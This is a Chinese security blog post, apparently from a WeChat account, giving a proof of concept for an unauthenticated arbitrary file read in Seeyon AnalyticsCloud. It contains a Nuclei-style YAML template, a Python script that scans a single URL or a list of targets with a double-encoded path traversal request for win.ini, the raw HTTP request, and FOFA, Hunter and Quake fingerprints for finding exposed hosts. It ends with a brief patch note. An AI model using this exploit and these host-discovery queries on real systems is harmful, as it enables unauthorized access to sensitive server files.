POC(Yaml&Python)
今天想必各位师傅都已各就各位,原神,启动!接下来本公众号将持续在HVV期间第一时间更新最新的0day/1day的POC信息,欢迎各位师傅动动小手点个关注。
话不多说先上POC(Yam-poc由yakit或ProjectDiscovery Cloud Platform生成,Python-poc脚本由chatgpt生成,准确性请自测,如您觉得有用,请动动小手点个关注,为您每天更新最新漏洞POC)
-
「Yaml」
id:
Seeyou-Analytics-Cloud-fileread
info:
name:
致远互联AnalyticsCloud
分析云
任意文件读取
author:
god
severity:
high
description:
致远互联AnalyticsCloud
分析云
任意文件读取
metadata:
fofa-query:
icon_hash="888607769"
tags:
fileread,seeyou
http:
-
raw:
-
|+
@timeout: 30s
GET /.%252e/.%252e/c:/windows/win.ini HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
max-redirects:
3
matchers-condition:
and
matchers:
-
type:
dsl
dsl:
-
'contains(body_1, "fonts")'
condition:
and
-
「Python」
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import
requests
import
argparse
from
urllib3.exceptions
import
InsecureRequestWarning
RED =
'�33[91m'
RESET =
'�33[0m'
# 忽略证书验证警告
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
def
check_file_read
(url)
:
headers = {
'User-Agent'
:
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15'
}
file_read_url =
f"
{url.rstrip(
'/'
)}
/.%252e/.%252e/c:/windows/win.ini"
try
:
response = requests.get(file_read_url, headers=headers, verify=
False
, timeout=
30
)
if
response.status_code ==
200
and
"fonts"
in
response.text:
print(
f"
{RED}
URL [
{url}
] 存在致远互联AnalyticsCloud 分析云 任意文件读取漏洞
{RESET}
"
)
else
:
print(
f"URL [
{url}
] 可能不存在漏洞"
)
except
requests.RequestException
as
e:
print(
f"URL [
{url}
] 请求失败:
{e}
"
)
def
main
()
:
parser = argparse.ArgumentParser(description=
'检测目标地址是否存在致远互联AnalyticsCloud 分析云 任意文件读取漏洞'
)
parser.add_argument(
'-u'
,
'--url'
, help=
'指定目标地址'
)
parser.add_argument(
'-f'
,
'--file'
, help=
'指定包含目标地址的文本文件'
)
args = parser.parse_args()
if
args.url:
if
not
args.url.startswith(
"http://"
)
and
not
args.url.startswith(
"https://"
):
args.url =
"http://"
+ args.url
check_file_read(args.url)
elif
args.file:
with
open(args.file,
'r'
)
as
file:
urls = file.read().splitlines()
for
url
in
urls:
if
not
url.startswith(
"http://"
)
and
not
url.startswith(
"https://"
):
url =
"http://"
+ url
check_file_read(url)
if
__name__ ==
'__main__'
:
main()
漏洞介绍
❝
致远分析云是北京致远互联专门为企业数字化转型升级而打造的一站式数据分析平台,旨在帮助企业实现数字化转型升级。其存在任意文件读取漏洞,未经身份认证的攻击者可以利用此漏洞读取系统内部敏感文件,获取敏感信息。
❞
资产测绘
-
「Fofa」
❝
icon_hash="888607769"
❞
-
「Hunter」
❝
favicon="d0bcbd3ad5d5212212f18d51c623c1dd"
❞
-
「Quake」
❝
favicon="d0bcbd3ad5d5212212f18d51c623c1dd"
❞
漏洞复现
「1、构造数据包」
GET /.%252e/.%252e/c:/windows/win.ini HTTP/1.1
Host: ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
「2、查看返回包」
修复方案
❝
官方已发布安全补丁,建议联系厂商打补丁或升级版本。 引入Web应用防火墙防护,配置接口拦截策略。 ❞
原文始发于微信公众号(浅梦安全):【漏洞复现|含POC】致远互联AnalyticsCloud 分析云 任意文件读取
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论